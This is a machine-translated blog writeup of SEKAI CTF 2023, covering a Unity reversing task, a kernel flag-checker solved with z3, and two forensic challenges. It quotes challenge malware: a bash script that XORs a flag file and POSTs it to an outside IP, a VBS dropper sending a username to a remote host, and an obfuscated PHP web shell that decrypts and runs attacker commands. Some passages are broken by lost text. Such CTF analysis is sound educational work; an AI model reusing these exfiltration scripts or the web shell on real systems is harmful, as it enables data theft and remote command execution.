{"componentChunkName":"component---src-templates-post-template-js","path":"/ctf-sekaictf-2023-en","result":{"data":{"markdownRemark":{"id":"8bff27e9-573e-5da9-a1d1-bb955a9f1e30","html":"
\n

This page has been machine-translated from the original page.

\n
\n

I participated in SEKAI CTF 2023, which started on 8/26, as part of 0nePadding.

\n

Our final rank this time was 347th.

\n

While lamenting my lack of skill, I am writing this writeup as usual to review the problems.

\n

There were several challenges that looked interesting, so I would also like to try the ones I could not solve later.

\n\n

Contents

\n\n

Azusawa’s Gacha World(Rev)

\n

I will not include screenshots because there seemed to be various copyright-related issues, but this challenge involved analyzing a copy of a social game app with the Flag embedded in it.

\n

The Flag was embedded in the image of an SSR whose gacha drop rate was set to 0%.

\n

The challenge binary was a game implemented in Unity, so I analyzed the logic by examining Assembly-CSharp.dll with ILSpy.

\n

Reference: How to Reverse Engineer a Unity Game | Kodeco

\n

However, I thought it would be faster to extract the resources than to follow the implementation, so I extracted the game images with AssetStudio and was able to obtain the Flag.

\n

Guardians of the Kernel(Rev)

\n
\n

It’s just a warmup but with another layer which is the kernel.

\n

Attachment

\n
\n

The challenge binaries provided were bzImage and initramfs.cpio.

\n

When I extracted the file system locally with the following command, I was able to obtain a kernel driver file named flag_checker.ko.

\n
mkdir root\ncd root; cpio -idv < ../initramfs.cpio
\n

After decompiling this with IDA, I obtained the following device_ioctl function.

\n
__int64 __fastcall device_ioctl(__int64 a1, int a2, __int64 a3)\n{\n  __int64 result; // rax\n  unsigned __int8 *v6; // rax\n  int v7; // edx\n  int v8; // eax\n  unsigned int v9; // eax\n  __int64 v10; // rdx\n\n  if ( a2 == 28673 )\n  {\n    if ( !layers[1] )\n      return 0LL;\n    if ( !copy_from_user(buffer, a3, 7LL) )\n    {\n      buffer[7] = 0;\n      v6 = buffer;\n      while ( (unsigned __int8)(*v6 - 48) <= 9u )\n      {\n        if ( &buffer[7] == ++v6 )\n        {\n          v7 = 7 * __ROL4__(1507359807 * __ROR4__(422871738 * *(_DWORD *)buffer, 15), 11);\n          v8 = __ROR4__(422871738 * ((buffer[5] << 8) ^ (buffer[6] << 16) ^ buffer[4]), 15);\n          v9 = 1984242169\n             * ((v7 + 1204333666) ^ (1507359807 * v8) ^ 7 ^ (((v7 + 1204333666) ^ (unsigned int)(1507359807 * v8)) >> 16));\n          if ( (((-1817436554 * ((v9 >> 13) ^ v9)) >> 16) ^ (-1817436554 * ((v9 >> 13) ^ v9))) != 261736481 )\n            return 0LL;\n          return device_ioctl_cold();\n        }\n      }\n      return 0LL;\n    }\n    return -14LL;\n  }\n  if ( a2 == 28674 )\n  {\n    if ( !layers[2] )\n      return 0LL;\n    v10 = copy_from_user(buffer, a3, 12LL);\n    if ( !v10 )\n    {\n      do\n      {\n        buffer[v10] += buffer[v10 + 1] * ~(_BYTE)v10;\n        ++v10;\n      }\n      while ( v10 != 12 );\n      if ( *(_QWORD *)buffer != 0x788C88B91D88AF0ELL || *(_DWORD *)&buffer[8] != 2113081836 || buffer[12] )\n        return 0LL;\n      printk(&unk_2EB, a3);\n      return 1LL;\n    }\n    return -14LL;\n  }\n  if ( a2 != 28672 )\n  {\n    printk(&unk_302, a3);\n    return 0LL;\n  }\n  if ( copy_from_user(buffer, a3, 6LL) )\n    return -14LL;\n  if ( *(_DWORD *)buffer != 1095451987 || *(_WORD *)&buffer[4] != 31561 )\n    return 0LL;\n  printk(&unk_2B6, a3);\n  result = 1LL;\n  layers[1] = 1;\n  return result;\n}
\n

The code is broadly split into three parts, and you can see that each part validates a portion of the Flag string.

\n

First, here is the initial layer.

\n
if ( a2 != 28672 )\n{\n    printk(&unk_302, a3);\n    return 0LL;\n}\nif ( copy_from_user(buffer, a3, 6LL) ) return -14LL;\nif ( *(_DWORD *)buffer != 1095451987 || *(_WORD *)&buffer[4] != 31561 ) return 0LL;\nprintk(&unk_2B6, a3);\nresult = 1LL;
\n

As you can tell at a glance, this shows that the first 6 bytes of the Flag match SEKAI{.

\n

\n \n \n \n \n \n \n \n \n

\n

Next, let us look at the following layer.

\n
if ( a2 == 28674 )\n{\nif ( !layers[2] )\n  return 0LL;\nv10 = copy_from_user(buffer, a3, 12LL);\nif ( !v10 )\n{\n  do\n  {\n    buffer[v10] += buffer[v10 + 1] * ~(_BYTE)v10;\n    ++v10;\n  }\n  while ( v10 != 12 );\n  if ( *(_QWORD *)buffer != 0x788C88B91D88AF0ELL || *(_DWORD *)&buffer[8] != 2113081836 || buffer[12] )\n    return 0LL;\n  printk(&unk_2EB, a3);\n  return 1LL;\n}\nreturn -14LL;\n}
\n

This part is also very simple: it applies buffer[i] += buffer[i + 1] * ~(_BYTE)i to the last 12 characters of the Flag and checks whether the result matches the hard-coded byte values.

\n

I was able to solve this with the following solver.

\n
from z3 import *\nflag = [BitVec(f\"flag[{i}]\", 8) for i in range(13)]\nbuf  = [BitVec(f\"buf[{i}]\", 8) for i in range(13)]\n\ns = Solver()\n\nfor i in range(12):\n    s.add(And(\n        (flag[i] >= 0x21),\n        (flag[i] <= 0x7e)\n    ))\n    s.add(flag[i] != 0)\n\ns.add(flag[12] == 0x00)\ns.add(buf[12] == 0x00)\n\n# buffer[i] += buffer[i + 1] * ~(_BYTE)i;\nfor i in range(12):\n    s.add(buf[i] == flag[i] + flag[i+1] * (~i & 0xFF) )\n\ns.add(buf[7] == 0x78)\ns.add(buf[6] == 0x8C)\ns.add(buf[5] == 0x88)\ns.add(buf[4] == 0xB9)\ns.add(buf[3] == 0x1D)\ns.add(buf[2] == 0x88)\ns.add(buf[1] == 0xAF)\ns.add(buf[0] == 0x0E)\n\ns.add(buf[11] == 0x7d)\ns.add(buf[10] == 0xf3)\ns.add(buf[9] == 0x11)\ns.add(buf[8] == 0xec)\n\nif s.check() == sat:\n    m = s.model()\n    for c in flag:\n        print(chr(m[c].as_long()),end=\"\")
\n

Running the above shows that the end of the Flag is SEKAIPL@YER}.

\n

Finally, let us look at the layer for the first half of the Flag.

\n

I could follow the implementation here, but I could not write the solver correctly during the contest, so I failed to solve it at the time (it seems I had misplaced some parentheses…).

\n
if ( a2 == 28673 )\n{\nif ( !layers[1] )\n  return 0LL;\nif ( !copy_from_user(buffer, a3, 7LL) )\n{\n  buffer[7] = 0;\n  v6 = buffer;\n  while ( (unsigned __int8)(*v6 - 48) <= 9u )\n  {\n    if ( &buffer[7] == ++v6 )\n    {\n      v7 = 7 * __ROL4__(1507359807 * __ROR4__(422871738 * *(_DWORD *)buffer, 15), 11);\n      v8 = __ROR4__(422871738 * ((buffer[5] << 8) ^ (buffer[6] << 16) ^ buffer[4]), 15);\n      v9 = 1984242169\n         * ((v7 + 1204333666) ^ (1507359807 * v8) ^ 7 ^ (((v7 + 1204333666) ^ (unsigned int)(1507359807 * v8)) >> 16));\n      if ( (((-1817436554 * ((v9 >> 13) ^ v9)) >> 16) ^ (-1817436554 * ((v9 >> 13) ^ v9))) != 261736481 )\n        return 0LL;\n      return device_ioctl_cold();\n    }\n  }\n  return 0LL;\n}\nreturn -14LL;\n}
\n

Implementation-wise, this compares the result of splitting the first 7 characters of the Flag into 4 bytes and 3 bytes and then applying several operations such as shifts, rotates, and multiplication.

\n
# Import modules\nfrom z3 import *\nfrom pwn import *\n\n# Create bit-vector variables\nbuf = BitVec(\"buf\", 32)\nbuf2 = BitVec(\"buf2\", 32)\n\n# Create a solver instance\ns = Solver()\ns.add(buf2>>24 == 0)\nfor i in range(4):\n    # LShR(>>)\n    s.add((LShR(buf,8*i) & 0xFF) >= 0x30)\n    s.add((LShR(buf,8*i) & 0xFF) <= 0x39)\n\nfor i in range(3):\n    # LShR(>>)\n    s.add((LShR(buf2,8*i) & 0xFF) >= 0x30)\n    s.add((LShR(buf2,8*i) & 0xFF) <= 0x39)\n\n# def ror(a,b): return (LShR(a,b)|(a<<(32-b))) & N # RotateRight\n# def rol(a,b): return ror(a,32-b) # RotateLeft\n\n# v7 = 7 * __ROL4__(1507359807 * __ROR4__(422871738 * *(_DWORD *)buffer, 15), 11);\n# v8 = __ROR4__(422871738 * ((buffer[5] << 8) ^ (buffer[6] << 16) ^ buffer[4]), 15);\n# v9 = 1984242169 * ((v7 + 1204333666) ^ (1507359807 * v8) ^ 7 ^ (((v7 + 1204333666) ^ (unsigned int)(1507359807 * v8)) >> 16));\n# if ( (((-1817436554 * ((v9 >> 13) ^ v9)) >> 16) ^ (-1817436554 * ((v9 >> 13) ^ v9))) != 261736481 )\n\nN = 0xFFFFFFFF\na = (422871738 * buf)\na = (1507359807 * RotateRight(a, 15))\nv7 = (7 * RotateLeft(a, 11))\nb = buf2\nv8 = RotateRight((422871738 * b), 15)\nv9 = (1984242169 * ((v7 + 1204333666) ^ (1507359807 * v8) ^ 7 ^ LShR((((v7 + 1204333666) ^ (1507359807 * v8))), 16)))\ns.add((LShR(((-1817436554 * (LShR(v9, 13) ^ v9))), 16) ^ (-1817436554 * (LShR(v9, 13) ^ v9))) == 0xF99C821)\n\n# Search for a solution\nif s.check() == sat:\n    print(p32(s.model()[buf].as_long()) + p32(s.model()[buf2].as_long()))\n\n# SEKAI{6001337SEKAIPL@YER}
\n

Because the result of running the above solver is 6001337, I was able to determine that the final correct Flag is SEKAI{6001337SEKAIPL@YER}.

\n

Eval_Me(Forensic)

\n
\n

I was trying a beginner CTF challenge and successfully solved it. But it didn’t give me the flag. Luckily I have this network capture. Can you investigate?

\n
\n

The challenge gives you a server that requires you to solve arithmetic problems within a fixed time limit, along with a pcap.

\n

First, after solving all of the arithmetic problems with the following solver, you can obtain a URL for downloading a file called extract.sh.

\n
from pwn import *\nimport binascii\nimport time\n\np = remote(\"chals.sekai.team\", 9000)\n\ndef calc(arr):\n    a = int(arr[0])\n    b = int(arr[2])\n    n = arr[1]\n    if n == \"+\":\n        return a+b\n    if n == \"-\":\n        return a-b\n    if n == \"*\":\n        return a*b\n    if n == \"/\":\n        return a/b\n\nprint(p.recvline())\nprint(p.recvline())\nprint(p.recvline())\nprint(p.recvline())\n\ni = 0\nwhile (i < 99):\n    r = p.recvline()\n    print(r)\n    r = r.decode().split(\" \")\n    p.sendline(\n        str(calc(r)).encode()\n    )\n    print(p.recvline())\n    i += 1\n\np.interactive()
\n

extract.sh was the following script.

\n
#!/bin/bash\n\nFLAG=$(cat flag.txt)\nKEY='s3k@1_v3ry_w0w'\n\n\n# Credit: https://gist.github.com/kaloprominat/8b30cda1c163038e587cee3106547a46\nAsc() { printf '%d' "'$1"; }\n\n\nXOREncrypt(){\n    local key="$1" DataIn="$2"\n    local ptr DataOut val1 val2 val3\n\n    for (( ptr=0; ptr < ${#DataIn}; ptr++ )); do\n\n        val1=$( Asc "${DataIn:$ptr:1}" )\n        val2=$( Asc "${key:$(( ptr % ${#key} )):1}" )\n\n        val3=$(( val1 ^ val2 ))\n\n        DataOut+=$(printf '%02x' "$val3")\n\n    done\n\n    for ((i=0;i<${#DataOut};i+=2)); do\n    BYTE=${DataOut:$i:2}\n    curl -m 0.5 -X POST -H "Content-Type: application/json" -d "{\\"data\\":\\"$BYTE\\"}" http://35.196.65.151:30899/ &>/dev/null\n    done\n}\n\nXOREncrypt $KEY $FLAG\n\nexit 0
\n

Here, you can see that the byte values of the Flag are XOR-encrypted using s3k@1_v3ry_w0w as the key and then sent in POST requests to some server.

\n

The packets for this communication correspond to the pcap included with the challenge binary.

\n

So I used the following one-liner with tshark to extract every byte value contained in the POST requests.

\n
tshark -r ./capture.pcapng  -Y \"http.request.method == POST\" -T fields -e json.value.string | tr '\\n' ' '
\n

Finally, by decrypting the XOR with the following solver, I was able to obtain the Flag.

\n
# tshark -r ./capture.pcapng  -Y \"http.request.method == POST\" -T fields -e json.value.string | tr '\\n' ' '\ndata = \"20 76 20 01 78 24 45 45 46 15 00 10 00 28 4b 41 19 32 43 00 4e 41 00 0b 2d 05 42 05 2c 0b 19 32 43 2d 04 41 00 0b 2d 05 42 28 52 12 4a 1f 09 6b 4e 00 0f\".split(\" \")\ndata = [int(\"0x\"+ i, 16) for i in data]\nkey = \"s3k@1_v3ry_w0w\"\n\ni = 0\nfor d in data:\n    print(\n        chr(d ^ ord(key[i % len(key)])), end=\"\"\n        )\n    i += 1\n# SEKAI{3v4l_g0_8rrrr_8rrrrrrr_8rrrrrrrrrrr_!!!_8483}
\n

DEF CON Invitation(Forensic)

\n
\n

As you all know, DEF CON CTF Qualifier 2023 was really competitive and we didn’t make it. Surprisingly, 2 months before the finals in Las Vegas, we received an official invitation from Nautilus Institute to attend the event. Should we accept the invitation and schedule the trip?

\n
\n

When I checked the HTML source embedded in the ics file attached to the eml file that was provided as the challenge binary, I found that it referenced the HTML page https://storage.googleapis.com/defcon-nautilus/venue-guide.html.

\n

When I fetched the source of that HTML, it contained the following JavaScript.

\n
const ror = (message) => {\n  const foo = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n  const bar = \"nopqrstuvwxyzabcdefghijklmNOPQRSTUVWXYZABCDEFGHIJKLM\"\n  return message.replace(/[a-z]/gi, letter => bar[foo.indexOf(letter)])\n}\n\nasync function dd(dataurl, fileName) {\n  const response = await fetch(dataurl);\n  const blob = await response.blob();\n\n  const link = document.createElement(\"a\");\n  link.href = URL.createObjectURL(blob);\n  link.download = fileName;\n  link.click();\n}\n  \nwindow.onload = function() {\n  const downloadButton = document.getElementById(\"downloadButton\");\n  downloadButton.onclick = function() {\n    dd(ror('uggcf://fgbentr.tbbtyrncvf.pbz/qrspba-anhgvyhf/irahr-znc.cat.iof'), ror('foi.tac.cnz-rhari').split(\"\").reverse().join(\"\"));\n  }\n};
\n

After roughly deobfuscating this logic, I was able to obtain a malicious VBS file named venue-map.png.vbs.

\n

As I continued print-debugging the VBS file by adding WScript.Echo, the download link for defcon-flag.png.XORed, an image file encrypted by OwOwO(ewkjunfw), was revealed.

\n

Reading further through the VBS processing, I found that the following code is called at the end.

\n
Dim http: Set http = CreateObject("WinHttp.WinHttpRequest.5.1")\nDim url: url = "http://20.106.250.46/sendUserData"\n\nWith http\n  Call .Open("POST", url, False)\n  Call .SetRequestHeader("Content-Type", "application/json")\n  Call .Send("{""username"":""" & strUser & """}")\nEnd With
\n

When I entered an arbitrary username and sent a POST request to this destination, it returned the message Not admin!.

\n

So I sent a POST request with the username set to admin, and I obtained the key 02398482aeb7d9fe98bf7dc7cc_ITDWWGMFNY.

\n

\n \n , in_bytes)\n for i, val in enumerate(arr):\n cur_key = key[i % len(key)]\n arr[i] = val ^ cur_key\n return bytes(arr)\n\n\ndef xor_file(input_file, output_file=None, key=None):\n with open(input_file, 'rb') as encoded_stream:\n buf = encoded_stream.read()\n buf = xor_bytes(buf, key=key)\n if output_file:\n with open(output_file, 'wb') as decoded_stream:\n decoded_stream.write(bytes(buf))\n return buf\n\nxor_file(\"defcon-flag.png.XORed\", output_file=\"defcon-flag.png\", key=KEY)\n

\n \n \n \n \n \n \n \n \n

\n

Also, because an unusually large number of requests to this server returned 404, I first filtered out only the packets with status code 200.

\n

\n \n \n \n \n \n \n \n \n

\n

I reviewed the list of GET queries, but I could not find anything that seemed directly connected to the ransomware infection.

\n

So next I narrowed the extracted packets down to the POST method.

\n

\n \n \n \n \n \n \n \n \n

\n

After looking through them, I noticed something obviously suspicious at the very bottom: data named file was being sent via POST to data.php.

\n

\n \n ];\n $a1721b = fopen($ab8a69['tmp_name'], \"r\");\n $abdfbe = fread($a1721b,filesize($ab8a69['tmp_name']));\n $ae25f0 = substr($abdfbe, 0, strpos($abdfbe, \"...\"));\n $aa1090 = substr($abdfbe, strpos($abdfbe, \"...\") + 3);\n $afd8f0 = \"-----BEGIN RSA PRIVATE KEY-----\\n\".chunk_split(base64_encode($aa1090), 64, \"\\n\").\"-----END RSA PRIVATE KEY-----\\n\";\n}\ncatch (Exception $e) {\n die(\"\");\n}\n\n$aa13a9 = \"KG2bFhlYm8arwrJfc+xWCYqeoySjgrWnvA9zuVfd/pBwnmC8vAdOTydYKDC0VE10xRTq6+79HX7QgCScYjQ8ogHzkppFN2ifFSBkM1bzWckTl6shvZvp8d7678ZxlPZOhm4q0MtJ7BMFRbZuSKl10o1UDUkwVm7CZfCBQd1NLf0=,OfCbPFExBkpXi5F+SohxpXQLHvICHKF64rUIxVwhR83nMmO0k9Xqjh4+FHMCz0KcFXF5CGR6WUWC+aDqDhJZTgossQ+h1tSEfHpFif87ip0/OEHerOfyfPtQR3E62xUW1++3gm8WB38nkFiP6o1bkIdd9ZYObwQsp0YPlrj6AlA=,MiH8FWh7hHp+Yr2/Kv78WvMItwiwaCiO4DwBTq/IXU99hHUvb8iayOBUzLtr4Xg9wBGzHq73fY266XK+60YboIC15Es1J7vN8XRsUhlxavf8ssVmYDz4gz08+V9Ow+0k39Ef9Ic4NSiN+vbHCyCdFkvFsbfuUbyCHoxZyAjp1Z4=,pjnJiJt4sgRW48wgVIEmygN5+0HJiAVma5JPxQMIcpYqZUBsPkAW6/2wcMjqkZ7wzXdYZy706JV5gGm1F2egrtEtrsfo2V5eVMOsgLmB/ApVYmYsJ0DBl/8npo0JtvKM3dMeOg9LL5v+26QLKOxDRSX74rAYNSw4iPeH5y4SxCQ=,KkU+QkZ1PbLmKmfcLUGxUDMIWTKoYo9YAfiwe5heK1WwbuqoH2ra3WEv3vLCePK6ovlJoybcCeutQNY5AiR5OOuEAS/uM82WBCffE03cxezkkQPWbA43bstduUHgM6afqxPj6YaFI/C2ARQCYOWGMzYLeCdLkuKfvriudv/XnO0=,CtiyfFrf9+p8L2m6js0jmyHt5+1kYjfD0uO2Nggvkv+fZuBfGmN2BWxvD+oUBVA2TXkKQi+pBBlsc+9WWIjnL7ZCyWol9qUOHIwGdN8ab2IKI3Zl5qUwIFQcJHGRVeAjGnEOGM8iU5T1JZjO+QwJB9LTvyh8Ki9SGjqqxnNGT/M=,VszkcW2yR61TdtOSpRlh4DZ05SOlNR0n8rOlzdmnE+3RBarszIVsSg+59Yc7B+8+NqAslN32qBcu0sW5e+Vz3ABxdnIgaMoQcJ5Ku9T2p2UbuZ0j+LYxTrcIqnlc+THi8Do9q+Lml34/woKDOIIkKrjHhVnf6dusxI7Dv7z3oU0=,pIDhg8+nNcqxxClYVaYAGKig3/T0KWWbDm0BWN0M3u8ST0Nw6Am/crxXGMddK8m6qW5oyOvWgiD6XdUy0cfUo3zeXCXo3UYa+hxrTIKj1SS/n4LkzQ6egSRq4XK1fECKApY+8eiLEMOvyixnzD2ohs6FA5R/a12bMx8xzLctTG8=,TwB9lsoQC47npnc0Fy+Gt85zuRkuk8e1kPjogierA3tZiA6zs+6Qc6d9Ri7kfpasekO4dhZsM1W9z0n/zWpq+0Xp5tJ77mpryGPfae3KRSTS0QscQMi/ZhD+Pi6ajL3FoxKI7wfZ7RA0OKGSxhbiNHcD6WEShSbHILkuC7wWVMw=,rq0fb0wiKfJyqd3CCVAmwu3a8EKvgZ9B3K7sct8BoeBG/PKbp8a8AC9AbWPqnjYSIcFNkexdH1lXJrvgLKrC4UaqpMdi+Zqu96oc3695VfN0zspAKZkjEUwU8PA+En7R5qwSMD4QLop+2qZ+Tx1DC7Y2QwvqH7kAxwwloou45zw=,eTJY1cWk0XfO166TYwkvxA+6A6Ee5xXv53PtV7nbblXGx8PlVXUa5DU/dAXzTuyO1Ykkh16t0TKlyF/7X1G2S5z8RPjmyzIwhALHWw+zvWhE5hDf3lhZ1co6L9/Y7nSgKwUuWTsi1ZPqlrJTTlCyE+gNJE4M+Rh8QfJ/YQsWMBM=,BBeqrThbTcuSguT+9V2a5w2zTeL2GG+WZx26DXy0Y/sH8D85PMTk2lsVNs0e+yj06RfAkQuq6LrYVyEC9wB63ovSKxKIY0vZLaqxwZwA8RdzVcoOrx1/+acY1WqgeG8ZJdXCK7DFcRakkAclhZYNwJO+yKvto+ytvbWcKo0eeDI=,i5rXk8yQ4RVFvlY+sKFvlD19qAA8+9qTtzEGHXeSI9O+v2TDAoLJQuNnp+m3WTReKf8WN3sZ4CTpvUpXR0UYbZ1TUSHRyvWTkm+2P6E4DXdRvotwp+HyviELbjTrn0ajilPV3+X3DF1m1MaDo5v03gBIFRxCuDJM3CYk8KFw/kQ=,\";\n$a4b1af = \"\";\n\n$af5e94 = explode(\",\", $aa13a9);\nforeach ($af5e94 as $a64500) {\n openssl_private_decrypt(base64_decode($a64500), $a64500, $afd8f0);\n $a4b1af .= $a64500;\n}\n\nif ($a4b1af == \"\") {\n die(\"\");\n}\nelse {\n eval($a4b1af);\n}\n?>\n

I saved the POST data extracted from the pcap as file.bin and reproduced the attack locally.

\n
# Start the PHP server\ndocker run --net host --rm -it -v `pwd`:/root php bash\nphp -S 127.0.0.1:8080\n\n# Send the file\ncurl -X POST -F file=@./file.bin http://localhost:8080/date.php
\n

When I tried print-debugging the value of the final eval($a4b1af), I was able to obtain the following PHP script.

\n
$pvk1 = \"-----BEGIN RSA PRIVATE KEY-----\nMIICXAIBAAKBgQCyYg7DzqjtPGCUT+q38iZcQDqZFC+lIxqo+g1/OhT45AMPtea0\nhabVZX77whFsQz5zE3fUXLZCzDnZpvtfr4Y8JSzGdL7O0qf3KAQIfk26YQeKOOje\nECNi5zUk3wf+5QUZjXnvDj+BUr78fV57zMpCBe65+mTiBpFkzsNTYo+VxwIDAQAB\nAoGBAKyHPrSPer8JOHf525DRudxbmtFXvsU/cJeiUc+Nw57+GR/m1R4gbj3TDsA8\n8VD+sLXoTGuux/FPSVyDrnjbcT25akm0FE+KkBZ6dNLFtOq6WQTe3N8HHDHkpqbZ\nqXbmuph4MqZlDpKMbEL1cQ81MkgAdPJnljvrjpIoqn5wZ7cRAkEA1+SjeaueSCu4\n4VzXTDOMkBqT5rEfJXnT7fN9eM48dXCd1LotWIL/2xcGkC4OdqT0kQiSs4pOQlcn\nLle18qOL5QJBANOFh3aaoGDfH60ecX2MHDnvHz4CSAIInlNXsPpbhWrt7blmGBeA\nnuwIiaQOMzvrj084xk3nI8PMIzdgxUFveDsCQA2w1h0VIQh6nVLNTGnsqvFIfjCW\n8t6xhxsD4eUTTwozhg7Db7S5Ofhu0V+7S/eCJnA8FvGDx8q1NCrgLQ2iCXECQDl2\ncRKbdy5Z7zUMrDA7O//RIl+qJv3GcZyamg2ph1lBQe+3+JuJ6aKdvya+ZNTGbaxL\n9DN9s42hi3+j3nKkYbkCQDy68qEICIdcLPFzv/sEN2JS1Cg21lJMH14ao0M3Di9B\nG4oDHVBHCRtDGXOviR8AG0VpghDHheonDFaX5O7VXUM=\n-----END RSA PRIVATE KEY-----\n\";\n$pbk1 = \"-----BEGIN PUBLIC KEY-----\nMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCyucnknkBP4whz0YJrblke667f\n5g4EfCmKcO2j7c+WEOWmbVBRZ/ETtqOIEM8Hp9rV605R1gJBf7tcxziEoX4wxQm5\nnfAqXkHUdloGyK7p7IZTh5tX6KnckCtrwbD7EFwjWBBceVHRmnmVdtF4yIkwaD2S\n4tw4O5CVYcIlIAAo6QIDAQAB\n-----END PUBLIC KEY-----\n\";\nopenssl_private_decrypt($ae25f0, $decrypted, $pvk1);\n$result = `{$decrypted} 2>&1`;\n$encrypted = \"\";\n$chunks = str_split($result, 116);\nforeach ($chunks as $chunk) {\n    openssl_public_encrypt($chunk, $tmp, $pbk1);\n    $encrypted .= base64_encode($tmp).\",\";\n}\necho $encrypted;
\n

After embedding this into PHP, adding a line to print $decrypted, and sending the POST request once more, I successfully obtained the correct Flag as shown below.

\n

\n \n \n \n \n \n \n \n \n

\n

Summary

\n

Every time I enter a contest, I am reminded of how far my skills still have to go.

","fields":{"slug":"/ctf-sekaictf-2023-en","tagSlugs":["/tag/ctf-en/","/tag/rev-en/","/tag/forensic-en/","/tag/english/"]},"frontmatter":{"date":"2023-08-28","description":"This is a writeup for SEKAI CTF 2023.","tags":["CTF (en)","Rev (en)","Forensic (en)","English"],"title":"SEKAI CTF 2023 Writeup","socialImage":{"publicURL":"/static/ed9d8e07d4379543e5cc63db49b8ac71/ctf-sekaictf-2023.png"}}}},"pageContext":{"slug":"/ctf-sekaictf-2023-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}